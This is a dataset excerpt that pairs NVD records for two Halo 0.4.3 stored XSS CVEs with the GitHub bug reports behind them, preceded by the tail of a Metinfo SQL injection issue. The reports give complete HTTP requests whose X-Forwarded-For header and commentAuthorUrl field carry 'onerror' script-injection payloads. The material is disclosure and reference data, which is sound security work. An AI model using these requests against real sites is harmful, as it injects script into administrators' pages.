zh,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 97 Connection: close Upgrade-Insecure-Requests: 1 p=a2f4o5bx6RZI%2BLtdPpO%2FCySYZmwV%2BhrSa8M8l7dYsdBrdKbLGnGRk6OjZqI4zXX8R77ticAdLP7qFA&password=1 ``` ![图片](https://user-images.githubusercontent.com/24249321/68370747-26fc6580-0178-11ea-9f41-8a06bc3eb7f7.png)
Metinfo7.0 SQL Injection
https://api.github.com/repos/SZFsir/tmpProject/issues/1/comments
0
2019-11-07T08:06:40Z
2019-11-07T08:06:40Z
https://github.com/SZFsir/tmpProject/issues/1
519,105,610
1
2,170
CVE-2020-18979
2021-07-12T15:15:07.973
Cross Siste Scripting (XSS) vulnerablity in Halo 0.4.3 via the X-forwarded-for Header parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "26D31740-00EC-4BF2-99BA-364F0A87F8CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/halo-dev/halo/issues/126
[ "Exploit", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **我确定我已经查看了** (标注`[ ]`为`[x]`) - [x] [Halo 使用文档](https://docs.halo.run/) - [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [其他 Issues](https://github.com/ruibaby/halo/issues) ---- **我要申请** (标注`[ ]`为`[x]`) - [x] BUG 反馈 - [ ] 添加新的特性或者功能 - [ ] 请求技术支持 ## Bug Report In [issue 9](https://github.com/halo-dev/halo/issues/9), someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point `X-Forwarded-For` payload HTTP Requests ```http POST /admin/getLogin HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 56 Connection: close Cookie: JSESSIONID= X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2 loginName=asas&loginPwd=asas ``` <img width="1096" alt="图片" src="https://user-images.githubusercontent.com/26483211/55526171-98e26d00-56c6-11e9-90dc-6dbe81885d3a.png"> <img width="1351" alt="图片" src="https://user-images.githubusercontent.com/26483211/55526211-b7486880-56c6-11e9-9024-2d4271807af7.png">
These is A stored xss vulnerability
https://api.github.com/repos/halo-dev/halo/issues/126/comments
2
2019-04-04T02:46:43Z
2019-05-28T17:54:37Z
https://github.com/halo-dev/halo/issues/126
429,058,076
126
2,171
CVE-2020-18982
2021-07-12T17:15:08.670
Cross Sie Scripting (XSS) vulnerability in Halo 0.4.3 via CommentAuthorUrl.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "26D31740-00EC-4BF2-99BA-364F0A87F8CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/halo-dev/halo/issues/127
[ "Exploit", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **我确定我已经查看了** (标注`[ ]`为`[x]`) - [x] [Halo 使用文档](https://docs.halo.run/) - [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [其他 Issues](https://github.com/ruibaby/halo/issues) ---- **我要申请** (标注`[ ]`为`[x]`) - [x] BUG 反馈 - [ ] 添加新的特性或者功能 - [ ] 请求技术支持 ## Bug Report I find that You have do HtmlUtil.escape for CommentContent ![图片](https://user-images.githubusercontent.com/26483211/55527086-22476e80-56ca-11e9-9953-d30d7b609a83.png) but do nothing with CommentAuthorUrl ![图片](https://user-images.githubusercontent.com/26483211/55527337-2d4ece80-56cb-11e9-816f-d00e281afd43.png) payload:`commentAuthorUrl="><img src=1 onerror=alert(123)>`\ <img width="902" alt="图片" src="https://user-images.githubusercontent.com/26483211/55527127-4440f100-56ca-11e9-93a3-58726ea901de.png"> ```http POST /newComment HTTP/1.1 Host: xxxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 306 Connection: close Cookie: JSESSIONID= X-Forwarded-For: 127.0.0.2 postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28 ``` in uri `/admin/comments?status=1` <img width="1406" alt="图片" src="https://user-images.githubusercontent.com/26483211/55527020-ea402b80-56c9-11e9-9899-cfd577514b9c.png">
These is Another stored xss vulnerability
https://api.github.com/repos/halo-dev/halo/issues/127/comments
2
2019-04-04T03:19:25Z
2019-05-28T17:53:30Z
https://github.com/halo-dev/halo/issues/127
429,064,568
127
2,172